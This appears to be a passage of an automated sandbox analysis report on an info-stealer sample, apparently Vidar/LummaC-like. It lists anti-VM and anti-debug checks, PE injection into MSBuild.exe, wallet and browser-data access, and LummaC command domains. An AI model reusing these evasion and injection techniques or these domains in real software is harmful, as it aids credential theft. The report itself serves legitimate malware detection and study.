Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 4.2.VmRHSCaiyc.exe.37dad8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.VmRHSCaiyc.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.VmRHSCaiyc.exe.37dad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1448499890.000000000037D000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VmRHSCaiyc.exe PID: 2024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6192, type: MEMORYSTR

Country aware sample found (crashes after keyboard check)

Source: c:\users\user\desktop\vmrhscaiyc.exe

Event Logs and Signature results: Application crash and keyboard check

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: VmRHSCaiyc.exe, MSBuild.exe	Binary or memory string: DIR_WATCH.DLL
Source: MSBuild.exe, 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: VmRHSCaiyc.exe, MSBuild.exe	Binary or memory string: SBIEDLL.DLL
Source: VmRHSCaiyc.exe, MSBuild.exe	Binary or memory string: API_LOG.DLL

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

5_2_0040180D

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcruntime140[1].dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	API coverage: 4.0 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API coverage: 5.3 %
Source: C:\ProgramData\HCFIIIJJKJ.exe	API coverage: 4.2 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7772	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 7916	Thread sleep count: 76 > 30			Jump to behavior

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_00410DB0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EC3h

5_2_00410DB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00369ABF FindFirstFileExW,	4_2_00369ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00416013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_00416013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0041547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	5_2_0041547D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00409CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_00409CF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00414D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	5_2_00414D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_0040D59B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	5_2_0040B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	5_2_0040BF22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_0040B914
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00415B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	5_2_00415B4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	5_2_0040CD0C
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002E9ABF FindFirstFileExW,	15_2_002E9ABF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_00415182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

5_2_00415182

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_00410F8F GetSystemInfo,wsprintfA,

5_2_00410F8F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: CGIDGC.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: CGIDGC.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: CGIDGC.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: CGIDGC.5.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: CGIDGC.5.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: CGIDGC.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: CGIDGC.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000001062000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.1787833590.00000000013B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CGIDGC.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: CGIDGC.5.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware.
Source: CGIDGC.5.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: MSBuild.exe, 00000010.00000002.1787833590.000000000138C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWhq<
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: CGIDGC.5.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: CGIDGC.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: CGIDGC.5.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000001028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`t
Source: CGIDGC.5.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: CGIDGC.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: CGIDGC.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: CGIDGC.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.9.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: CGIDGC.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: CGIDGC.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: CGIDGC.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: CGIDGC.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: CGIDGC.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: CGIDGC.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: CGIDGC.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: CGIDGC.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: CGIDGC.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: CGIDGC.5.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: CGIDGC.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: CGIDGC.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: CGIDGC.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: CGIDGC.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe

Code function: 4_2_00357922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_00357922

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

5_2_00418ADE

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00352003 mov edi, dword ptr fs:[00000030h]	4_2_00352003
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0037E37A mov eax, dword ptr fs:[00000030h]	4_2_0037E37A
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0037E362 mov eax, dword ptr fs:[00000030h]	4_2_0037E362
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0037E385 mov eax, dword ptr fs:[00000030h]	4_2_0037E385
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003955FE mov eax, dword ptr fs:[00000030h]	4_2_003955FE
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0036A64C mov eax, dword ptr fs:[00000030h]	4_2_0036A64C
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00360F2E mov ecx, dword ptr fs:[00000030h]	4_2_00360F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_004014AD mov eax, dword ptr fs:[00000030h]	5_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040148A mov eax, dword ptr fs:[00000030h]	5_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_004014A2 mov eax, dword ptr fs:[00000030h]	5_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00418725 mov eax, dword ptr fs:[00000030h]	5_2_00418725
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00418726 mov eax, dword ptr fs:[00000030h]	5_2_00418726
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002D2003 mov edi, dword ptr fs:[00000030h]	15_2_002D2003
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002EA64C mov eax, dword ptr fs:[00000030h]	15_2_002EA64C
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002E0F2E mov ecx, dword ptr fs:[00000030h]	15_2_002E0F2E

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe

Code function: 4_2_0036CC4B GetProcessHeap,

4_2_0036CC4B

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00357610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00357610
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00357922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00357922
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0035DA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0035DA73
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00357AAF SetUnhandledExceptionFilter,	4_2_00357AAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0041D1A8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0041D1A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0041DB1C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_0041DB1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_004277BE SetUnhandledExceptionFilter,	5_2_004277BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D34AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_6D34AC62
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002D7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_002D7610
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002D7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_002D7922
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002DDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_002DDA73
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002D7AAF SetUnhandledExceptionFilter,	15_2_002D7AAF

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: VmRHSCaiyc.exe PID: 2024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6192, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

5_2_0040F51F

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A			Jump to behavior

LummaC encrypted strings found

Source: HCFIIIJJKJ.exe	String found in binary or memory: isoplethui.sbs
Source: HCFIIIJJKJ.exe	String found in binary or memory: frizzettei.sbs
Source: HCFIIIJJKJ.exe	String found in binary or memory: exemplarou.sbs
Source: HCFIIIJJKJ.exe	String found in binary or memory: wickedneatr.sbs
Source: HCFIIIJJKJ.exe	String found in binary or memory: invinjurhey.sbs
Source: HCFIIIJJKJ.exe	String found in binary or memory: laddyirekyi.sbs
Source: HCFIIIJJKJ.exe	String found in binary or memory: exilepolsiy.sbs
Source: HCFIIIJJKJ.exe	String found in binary or memory: bemuzzeki.sbs

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0041247D __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		5_2_0041247D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00412554 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		5_2_00412554

Writes to foreign memory regions

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D8C008	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44B000	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1195008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\HCFIIIJJKJ.exe "C:\ProgramData\HCFIIIJJKJ.exe"	Jump to behavior
